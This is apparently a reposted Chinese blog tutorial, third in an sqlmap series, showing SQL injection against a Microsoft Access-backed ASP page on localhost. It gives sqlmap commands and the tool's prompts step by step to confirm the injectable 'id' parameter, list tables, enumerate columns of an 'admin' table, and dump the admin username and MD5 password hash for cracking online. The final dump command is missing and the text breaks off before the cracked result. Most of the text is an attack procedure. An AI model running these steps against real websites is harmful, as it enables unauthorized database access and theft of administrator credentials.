sqlmap之(三)----Access注入實戰


(1) 猜解是否能注入

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513"  

 

 



it looks like the back-end DBMS is 'Microsoft Access'. Do you want to skip test payloads specific for other DBMSes? [Y/n] 

 

它后端DBMS看起來像是“Microsoft Access”。 是否要跳過特定於其他DBMS的測試有效內容

 

輸入"Y"。

 

 

GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)?

 

GET參數'id'是脆弱的。 你想要繼續測試其他人(如果有的話)

 

輸入"Y"。

 

 

猜出來的數據庫是"Microsoft Access"數據庫。

 

(2) 猜解表

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --tables  


 

 

do you want to use common table existence check? [Y/n/q]

 

是否要使用公共表存在檢查存在? 輸入"Y"

 

 

 

please enter number of threads? [Enter for 1 (current)]    請輸入線程數? [輸入 1 (當前)]

 

然后要你輸入線程數,這里輸入10,線程數不能輸入過大,否則會提示錯誤。

 

 

猜解成功后得出的表。

 

(3) 根據猜解的表進行猜解表的字段(假如通過2得到了admin這個表)

 

 

[html]  view plain  copy
 
  1. sqlmap.py -u "http://localhost:8003/Production/PRODUCT_DETAIL.asp?id=1513" --columns -T admin  

 

 

 

do you want to use common column existence check? [Y/n/q]    你想使用公共列存在檢查嗎?[Y/n/q]

 

輸入"Y"。然后輸入線程數

 

 

一番等待結果就出來了。

 

 

(4) 根據字段猜解內容(假如通過3得到字段為admin和password)

 

 

 

他會詢問你: do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]

 

你想存儲的哈希值來與其他工具最終進一步處理臨時文件?

 

輸入"Y";

 

然后他又會詢問你: do you want to crack them via a dictionary-based attack? [Y/n/q]

 

你想通過基於字典的攻擊來破解他們嗎?

 

 

輸入"N"; 使用它自帶的

 

 

用戶名與密碼就出來了。密碼是MD5加密的: a48e190fafc257d3  放到網上去解密,解密之后得到的結果為

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM